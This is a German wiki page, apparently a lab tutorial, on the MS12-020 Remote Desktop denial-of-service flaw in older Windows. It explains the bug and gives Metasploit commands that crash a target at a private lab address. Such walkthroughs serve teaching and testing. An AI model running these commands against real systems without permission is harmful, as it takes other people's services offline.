Microsoft RDP Denial of Service

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen

Details zur Schwachstelle: MS12-020 (Denial-of-Service)

Schwachstelle: MS12-020 ist eine Schwachstelle in der Implementierung des Remote Desktop Protocols (RDP) in Windows. Diese Schwachstelle kann dazu genutzt werden, durch die falsche Verarbeitung des `maxChannelIDs`-Feldes im MCSPDU-Paket einen Denial-of-Service (DoS) Angriff auszulösen. Dies geschieht durch die Nutzung eines ungültigen Zeigers, was den RDP-Dienst zum Absturz bringen kann.

Angriffspunkt: Die Schwachstelle befindet sich im RDP-Dienst auf Windows-Betriebssystemen (Port 3389). Ein Angreifer kann speziell gestaltete RDP-Pakete senden, um die Schwachstelle auszunutzen und den Dienst zum Absturz zu bringen, ohne dass eine Authentifizierung erforderlich ist.

Ausnutzung: Ein Angreifer nutzt ein speziell entwickeltes Exploit-Tool, wie es im MS12-020-Exploit von Metasploit verfügbar ist, um den RDP-Dienst gezielt zum Absturz zu bringen. Ein erfolgreicher Angriff führt zu einem Systemabsturz oder Neustart des Zielsystems.

Schritte zur Ausnutzung

  1. Führe in Metasploit den Befehl "search ms12-020" aus, um nach dem passenden Exploit zu suchen.
  2. Wähle das Exploit-Modul aus: `use auxiliary/dos/windows/rdp/ms12_020_maxchannelids`.
  3. Setze die Ziel-IP-Adresse (RHOSTS) auf die IP des verwundbaren Systems (z. B. `set RHOSTS 10.0.10.108`).
  4. Starte den Exploit mit dem Befehl `exploit`. Bei erfolgreicher Ausführung wird das System abstürzen oder neu starten.

Warum ist diese Schwachstelle gefährlich?

  • Denial-of-Service (DoS): Ermöglicht es einem Angreifer, den Remote Desktop-Dienst des Zielsystems zum Absturz zu bringen, wodurch der Dienst nicht verfügbar ist.
  • Zugriffspunkte: Die Schwachstelle betrifft mehrere Windows-Versionen, einschließlich Windows Server 2008 R2, die RDP aktiviert haben.
  • Minimale Anforderungen: Der Angriff erfordert keine Authentifizierung und kann aus der Ferne ausgeführt werden, wenn RDP offen und zugänglich ist.
  • Netzwerkunterbrechungen: DoS-Angriffe können die Verfügbarkeit kritischer Dienste stören und somit zu finanziellen Verlusten und Rufschädigungen führen.

Suche

  • search ms12-020
Matching Modules
================

   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/rdp/ms12_020_check              .                normal  Yes    MS12-020 Microsoft Remote Desktop Checker
   1  auxiliary/dos/windows/rdp/ms12_020_maxchannelids  2012-03-16       normal  No     MS12-020 Microsoft Remote Desktop Use-After-Free DoS

MS12-020 (Denial-of-Service) Exploit überprüfen

Der MS12-020-Exploit ist eine bekannte Schwachstelle in älteren Windows-Versionen, einschließlich Windows Server 2008 R2. Es handelt sich um eine Schwachstelle im Remote Desktop Protocol (RDP).

Anwenden

  • use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
  • set RHOSTS 10.0.10.107
  • exploit
Abgerufen von „http://wiki.ixheim.de/index.php?title=Microsoft_RDP_Denial_of_Service&oldid=55929